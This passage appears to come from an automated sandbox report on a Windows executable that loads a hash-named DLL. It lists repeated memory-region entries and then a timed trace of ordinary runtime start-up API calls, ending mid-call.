= 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14837 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14838 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14839 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14840 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14841 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14842 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14843 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14844 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14847 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14848 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14849 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14850 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14851 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14852 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14853 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14854 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14855 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14856 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14857 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14858 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14859 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14860 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14861 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14862 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14863 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 184 os_tid = 0xdf0 [0175.389] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.389] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0175.390] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.390] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0175.390] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0175.390] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.390] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0175.391] GetProcessHeap () returned 0x4a0000 [0175.391] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.391] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0175.391] GetLastError () returned 0x7e [0175.391] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0175.391] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0175.392] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c8) returned 0x4ac320 [0175.392] SetLastError (dwErrCode=0x7e) [0175.392] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1200) returned 0x4b3470 [0175.394] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0175.394] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0175.394] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0175.394] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0175.394] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" [0175.394] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" [0175.394] GetACP () returned 0x4e4 [0175.394] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x228) returned 0x4a5380 [0175.394] IsValidCodePage (CodePage=0x4e4) returned 1 [0175.394] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0175.395] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0175.395] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0175.395] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.395] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0175.395] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0175.395] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0175.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0175.395] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0175.395] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0175.395] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0175.395] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100) returned 0x4b2060 [0175.396] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17e) returned 0x4a9aa0 [0175.396] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0175.396] GetLastError () returned 0x0 [0175.396] SetLastError (dwErrCode=0x0) [0175.396] GetEnvironmentStringsW () returned 0x4b4680* [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9cc) returned 0x4b5060 [0175.396] FreeEnvironmentStringsW (penv=0x4b4680) returned 1 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x118) returned 0x4aa470 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3e) returned 0x4b0450 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x5c) returned 0x4a0780 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a4c00 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x78) returned 0x4ac6f0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a5a40 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x28) returned 0x4ab8f0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x48) returned 0x4b04a0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1a) returned 0x4ab590 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3a) returned 0x4b0130 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a4970 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2a) returned 0x4ac770 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 